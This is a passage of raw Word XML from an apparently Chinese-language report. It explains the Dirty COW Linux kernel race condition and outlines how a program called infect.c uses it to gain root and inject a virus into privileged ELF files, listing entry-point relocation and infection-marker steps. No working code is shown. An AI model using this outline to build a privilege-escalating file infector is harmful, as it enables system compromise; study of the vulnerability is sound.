        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux内核的内存子系统在处理copy-on-write（COW）时出现竞争条件，导致私有只读存储器映射被破坏</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、获取读写权限后可进一步提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251FB34" w14:textId="77777777" w:rsidR="002F33C7" w:rsidRPr="002F33C7" w:rsidRDefault="002F33C7" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1F0123" w14:textId="77777777" w:rsidR="00B851F5" w:rsidRPr="002F33C7" w:rsidRDefault="00B851F5" w:rsidP="002F33C7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>影响范围</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：Linux kernel&gt;2.6.22 (released in 2007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B7050" w14:textId="77777777" w:rsidR="00E716F7" w:rsidRDefault="00AC3799" w:rsidP="002F33C7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过程序（</w:t>
      </w:r>
      <w:r w:rsidR="00B851F5" w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>infect.c</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00B851F5" w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的attack模块</w:t>
      </w:r>
      <w:r w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现对</w:t>
      </w:r>
      <w:r w:rsidR="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的攻击，</w:t>
      </w:r>
      <w:r w:rsidR="00DC777D" w:rsidRPr="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击代码样例见附录</w:t>
      </w:r>
      <w:r w:rsidR="002F33C7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18906350" w14:textId="77777777" w:rsidR="002F33C7" w:rsidRPr="002F33C7" w:rsidRDefault="002F33C7" w:rsidP="002F33C7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1978">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解释</w:t>
      </w:r>
      <w:r w:rsidR="00A54B2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(部分引用自</w:t>
      </w:r>
      <w:r w:rsidR="00756469">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidR="00C12B3C">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全客</w:t>
      </w:r>
      <w:r w:rsidR="00A54B2A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EBB04" w14:textId="77777777" w:rsidR="001601AB" w:rsidRPr="001601AB" w:rsidRDefault="00AB727A" w:rsidP="001601AB">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0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首先程序会调用write</w:t>
      </w:r>
      <w:r w:rsidR="00B57101">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">系统调用， </w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidR="00625C66">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="002B57E0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>系统调用会</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>向/proc/self/mem文件中写入数据，</w:t>
      </w:r>
      <w:r w:rsidR="002B57E0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>此时，</w:t>
      </w:r>
      <w:r w:rsidR="002D68C6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>trap内陷</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>后内核会调用get_user_pages</w:t>
      </w:r>
      <w:r w:rsidR="006E318C">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>函数获取要写入</w:t>
      </w:r>
      <w:r w:rsidR="002D68C6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>内存地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99892E" w14:textId="77777777" w:rsidR="00E716F7" w:rsidRPr="001601AB" w:rsidRDefault="00E716F7" w:rsidP="001601AB">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>get_user_pages</w:t>
      </w:r>
      <w:r w:rsidR="001944F9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>会调用follow_page_mask</w:t>
      </w:r>
      <w:r w:rsidR="0096355A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>来获取这块内存的页表项，并同时要求页表项所指向的内存映射具有可写的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203085F3" w14:textId="77777777" w:rsidR="00E716F7" w:rsidRPr="001601AB" w:rsidRDefault="00E716F7" w:rsidP="001601AB">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>第一次获取内存的页表项会因为缺页而失败。get_user_page</w:t>
      </w:r>
      <w:r w:rsidR="00617345">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>调用faultin_page</w:t>
      </w:r>
      <w:r w:rsidR="00617345">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>进行缺页处理后第二次调用follow_page_mask</w:t>
      </w:r>
      <w:r w:rsidR="00617345">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>获取这块内存的页表项，如果需要获取的页表项指向的是一个只读的映射，那第二次获取也会失败。这时候get_user_pages</w:t>
      </w:r>
      <w:r w:rsidR="00756469">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>函数会第三次调用follow_page_mask</w:t>
      </w:r>
      <w:r w:rsidR="00756469">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>来获取该内存的页表项，并且不再要求页表项所指向的内存映射具有可写的权限，这时是可以成功获取的，获取成功后内核会对这个只读的内存进行强制的写入操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F85C3" w14:textId="77777777" w:rsidR="00E716F7" w:rsidRPr="00E040AA" w:rsidRDefault="00756469" w:rsidP="00756469">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0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按照linux设计者的意图，</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="001601AB">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>这个实现是没有问题的，因为本来写入/proc/self/mem就是一个无视映射权限的强行写入，就算是文件映射到虚拟内存中，也不会出现越权写：如果写入的虚拟内存是一个VM_PRIVATE的映射，那在缺页的时候内核就会执行COW操作产生一个副本来进行写入，写入的内容是不会同步到文件中的</w:t>
      </w:r>
      <w:r w:rsidR="00726291">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E716F7" w:rsidRPr="00E040AA">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>如果写入的虚拟内存是一个VM_SHARE的映射，那mmap能够映射成功的充要条件就是进程拥有对该文件的写权限，这样写入的内容同步到文件中也不算越权了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B2C16" w14:textId="77777777" w:rsidR="00E716F7" w:rsidRPr="00E0159B" w:rsidRDefault="00E716F7" w:rsidP="00E0159B">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0159B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">但是，在上述流程中，如果第二次获取页表项失败之后，另一个线程调用madvice(addr,addrlen, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0159B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MADV_DONTNEED),其中addr~addr+addrlen是一个只读文件的VM_PRIVATE的只读内存映射，那该映射的页表项会被置空。这时如果get_user_pages函数第三次调用follow_page_mask来获取该内存的页表项。由于这次调用不再要求该内存映射具有写权限，所以在缺页处理的时候内核也不再会执行COW操作产生一个副本以供写入。所以缺页处理完成后后第四次调用follow_page_mask获取这块内存的页表项的时候，不仅可以成功获取，而且获取之后强制的写入的内容也会同步到映射的只读文件中。从而导致了只读文件的越权写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A6FBD8" w14:textId="77777777" w:rsidR="006C25BA" w:rsidRPr="00B851F5" w:rsidRDefault="006C25BA" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3118671F" w14:textId="77777777" w:rsidR="006C25BA" w:rsidRDefault="006C25BA" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1038E3BC" w14:textId="77777777" w:rsidR="006C25BA" w:rsidRPr="00AC3799" w:rsidRDefault="006C25BA" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7185641B" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRDefault="001C7A47" w:rsidP="00382454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00382454">
        <w:rPr>
          <w:rFonts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用root权限将病毒母体写入高权限文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E6495" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRDefault="006C25BA" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒</w:t>
      </w:r>
      <w:r w:rsidR="00C857D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码存在于</w:t>
      </w:r>
      <w:r w:rsidR="00044A05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序（</w:t>
      </w:r>
      <w:r w:rsidR="001E6AA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>infect.c</w:t>
      </w:r>
      <w:r w:rsidR="00044A05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中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B321A" w14:paraId="698E0ED4" w14:textId="77777777" w:rsidTr="002B321A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31457CE0" w14:textId="77777777" w:rsidR="002B321A" w:rsidRPr="004F6F46" w:rsidRDefault="002B321A" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>Attack the bug to get the root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D4618F" w14:textId="77777777" w:rsidR="002B321A" w:rsidRPr="004F6F46" w:rsidRDefault="002B321A" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>Then insert the code as follows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BAF9007" w14:textId="77777777" w:rsidR="002B321A" w:rsidRPr="004F6F46" w:rsidRDefault="005A6F88" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>change the jump address in the virus code</w:t>
            </w:r>
            <w:r w:rsidR="00D02FE8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004F6F46">
              <w:t xml:space="preserve">(the jump address to the </w:t>
            </w:r>
            <w:r w:rsidR="00D02FE8" w:rsidRPr="004F6F46">
              <w:t>original</w:t>
            </w:r>
            <w:r w:rsidRPr="004F6F46">
              <w:t xml:space="preserve"> code are dynamic calculated).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="793537A7" w14:textId="77777777" w:rsidR="005A6F88" w:rsidRPr="004F6F46" w:rsidRDefault="005A6F88" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>relocate entry</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A4FD14" w14:textId="77777777" w:rsidR="005A6F88" w:rsidRPr="004F6F46" w:rsidRDefault="005A6F88" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>inject the virus code to finish infection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198DA20A" w14:textId="77777777" w:rsidR="005A6F88" w:rsidRDefault="005A6F88" w:rsidP="002B321A">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:t>put the sign to get rid of infection twice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09DBD9DF" w14:textId="77777777" w:rsidR="002A68F8" w:rsidRPr="006C25BA" w:rsidRDefault="002A68F8" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52420758" w14:textId="77777777" w:rsidR="00382454" w:rsidRPr="00382454" w:rsidRDefault="001C7A47" w:rsidP="00382454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/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2454">
        <w:rPr>
          <w:rFonts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当高权限文件执行时，病毒文件被激活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2091CF" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRDefault="001C7A47" w:rsidP="00382454">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒文件首先运行自身，再将操作权交给源文件</w:t>
      </w:r>
      <w:r w:rsidR="00382454">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:r w:rsidR="00172586">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了保证病毒的正确运行，需要首先修改E</w:t>
      </w:r>
      <w:r w:rsidR="00172586">
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidR="00172586">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的几个定位</w:t>
      </w:r>
      <w:r w:rsidR="00E55B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86A00B" w14:textId="77777777" w:rsidR="00E55B22" w:rsidRDefault="00E55B22" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:t xml:space="preserve">ELF </w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>entry</w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:t xml:space="preserve"> the ELF header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6AAC6" w14:textId="56820E25" w:rsidR="00E55B22" w:rsidRDefault="00E55B22" w:rsidP="00012F69">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
